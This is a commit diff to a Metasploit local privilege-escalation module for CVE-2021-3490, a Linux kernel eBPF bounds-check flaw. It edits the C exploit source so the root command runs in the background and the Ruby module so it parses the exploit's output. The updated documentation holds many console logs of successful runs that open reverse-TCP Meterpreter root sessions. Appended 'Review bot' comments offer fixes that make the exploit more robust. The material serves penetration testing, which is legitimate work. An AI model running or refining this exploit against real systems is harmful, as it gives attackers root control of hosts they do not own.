Update the exploit code to append `&` to the command executed as root so it runs in the background and does not hang Metasploit. Also update the module logic to check the response from running the exploit and respond accordingly, and update the documentation to match.
This commit is contained in:
parent
6f9b06fb4b
commit
3bca3b0bcb
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -202,9 +202,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -232,7 +233,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Writing '/tmp/.802fke5' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.75mogl0Vz6' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.221
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.802fke5
|
||||
[+] Deleted /tmp/.75mogl0Vz6
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.221:42170) at 2021-08-17 17:40:19 -0500
|
||||
|
@ -317,9 +321,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -346,13 +351,18 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Started reverse TCP handler on 192.168.224.128:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Writing '/tmp/.8lHII9pIja' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.x3iDbm3J' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[*] Writing '/tmp/.T0AUoK' (39400 bytes) ...
|
||||
[*] Writing '/tmp/.R3N8FO' (250 bytes) ...
|
||||
[*] Launching exploit...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 9000 seconds are up.
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.220
|
||||
[+] Deleted /tmp/.8lHII9pIja
|
||||
[+] Deleted /tmp/.x3iDbm3J
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.220:47878) at 2021-08-17 17:53:36 -0500
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.T0AUoK
|
||||
[+] Deleted /tmp/.R3N8FO
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.220:47914) at 2021-08-31 14:58:43 -0500
|
||||
|
||||
meterpreter >
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 192.168.224.220
|
||||
|
@ -422,9 +432,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -454,7 +465,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Writing '/tmp/.RyfMnlY' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.7JmBQ1nu58' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.222
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.RyfMnlY
|
||||
[+] Deleted /tmp/.7JmBQ1nu58
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.222:48204) at 2021-08-19 14:17:12 -0500
|
||||
|
@ -544,9 +558,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -576,7 +591,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Writing '/tmp/.VBiCx' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.KqjrGX5' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.223
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.VBiCx
|
||||
[+] Deleted /tmp/.KqjrGX5
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.223:54884) at 2021-08-20 13:33:38 -0500
|
||||
|
@ -679,9 +697,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION 1 yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION 1 yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -709,7 +728,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Writing '/tmp/.6y6Ws' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.SYYFfC' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.223
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.6y6Ws
|
||||
[+] Deleted /tmp/.SYYFfC
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.223:37368) at 2021-08-20 14:47:44 -0500
|
||||
|
@ -750,9 +772,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION 1 yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION 1 yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -786,8 +809,11 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Writing '/tmp/.RRaKt' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.yYaQKj' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.223
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.RRaKt
|
||||
[+] Deleted /tmp/.yYaQKj
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.223:60752) at 2021-08-20 16:34:42 -0500
|
||||
|
@ -839,9 +865,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -893,7 +920,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Writing '/tmp/.dFIC3w' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.sYuymmhR3Y' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.223
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.dFIC3w
|
||||
[+] Deleted /tmp/.sYuymmhR3Y
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.223:53154) at 2021-08-20 18:02:58 -0500
|
||||
|
@ -949,9 +979,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION 1 yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION 1 yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -983,8 +1014,11 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Writing '/tmp/.TGPokxM' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.RM7G8l5CtW' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.224
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.TGPokxM
|
||||
[+] Deleted /tmp/.RM7G8l5CtW
|
||||
[*] Meterpreter session 3 opened (192.168.224.128:6644 -> 192.168.224.224:45650) at 2021-08-23 14:50:52 -0500
|
||||
|
|
|
@ -573,7 +573,10 @@ int main(int argc, char **argv)
|
|||
}
|
||||
|
||||
printf("[+] success! enjoy r00t :)\n");
|
||||
system(argv[1]);
|
||||
char stringToExecute[9000];
|
||||
strcpy(stringToExecute, argv[1]);
|
||||
strcat(stringToExecute, " &");
|
||||
system(stringToExecute);
|
||||
|
||||
done:
|
||||
cleanup(&ctx);
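Review bot: The added `strcpy(stringToExecute, argv[1])` copies argv[1] into a fixed 9000-byte stack buffer with no length check, so an argument of 8998 bytes or more overflows the stack right after the kernel bug has been triggered; in the module's use argv[1] is a short temp path, but the binary accepts anything from the command line. A bounded `snprintf` with a size check removes the overflow and also folds the `" &"` into one step, and since the module greps the output for the word `fail` (see the Ruby hunk), printing a `fail` line on the error path lets Metasploit report it instead of silently continuing. Note also that with `&` the `system()` return value no longer says anything about the payload, only about the shell fork, so it should not be used as a success signal. `main` begins outside this hunk.
```c
    printf("[+] success! enjoy r00t :)\n");
    char stringToExecute[9000];
    if (snprintf(stringToExecute, sizeof(stringToExecute), "%s &", argv[1]) >= (int)sizeof(stringToExecute)) {
        printf("[-] fail: command too long\n");
        goto done;
    }
    system(stringToExecute);
    /* … unchanged: done: label and cleanup(&ctx) … */
```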
|
||||
|
|
|
@ -71,9 +71,11 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
register_options([
|
||||
OptInt.new('CmdTimeout', [true, 'Maximum number of seconds to wait for the exploit to complete', 120])
|
||||
])
|
||||
register_advanced_options([
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
|
||||
OptInt.new('CmdTimeout', [true, 'Maximum number of seconds to wait for the exploit to complete', 200])
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
|
||||
])
|
||||
end
|
||||
|
||||
|
@ -203,7 +205,17 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
register_file_for_cleanup(payload_path)
|
||||
|
||||
# Launch exploit
|
||||
print_status('Launching exploit ...')
|
||||
cmd_exec(executable_path.to_s, payload_path.to_s, datastore['CmdTimeout'])
|
||||
print_status('Launching exploit...')
|
||||
print_warning('Note that things may appear to hang due to the exploit not exiting.')
|
||||
print_warning("Feel free to press CTRL+C if the shell is returned before #{datastore['CmdTimeout']} seconds are up.")
|
||||
response = cmd_exec(executable_path.to_s, payload_path.to_s, datastore['CmdTimeout'])
|
||||
if response =~ /fail/
|
||||
fail_with(Failure::NoTarget, 'The exploit failed! Check to see if you are running this against the right target and kernel version!')
|
||||
vprint_error("The response was: #{response}")
|
||||
elsif response =~ /success\!/
|
||||
print_good('Exploit completed successfully, shell should be returning soon!')
|
||||
else
|
||||
print_status('No indication of exploit success or failure, try increasing CmdTimeout value!')
|
||||
end
|
||||
end
|
||||
end
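Review bot: In the new failure branch the `vprint_error("The response was: #{response}")` line is unreachable, because `fail_with` raises and aborts the module before it runs, so the exploit output is never shown even with verbose on; the two lines should be swapped, `vprint_error("The response was: #{response}")` then `fail_with(Failure::NoTarget, ...)`. The matching itself is also loose: `/fail/` and `/success\!/` are matched against whatever `cmd_exec` returned, which on a timeout may be empty, and `\!` is a redundant escape — `response.to_s.match?(/fail/)` and `response.to_s.match?(/success!/)` read cleaner and cannot misbehave on a nil return. Since the exploit now backgrounds the payload with `&`, the "try increasing CmdTimeout" hint in the else branch is presumably only relevant when the binary itself stalls before printing; a short comment saying so above the `else` would help the next maintainer. The enclosing `exploit` method begins outside this hunk.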
|
||||
|
|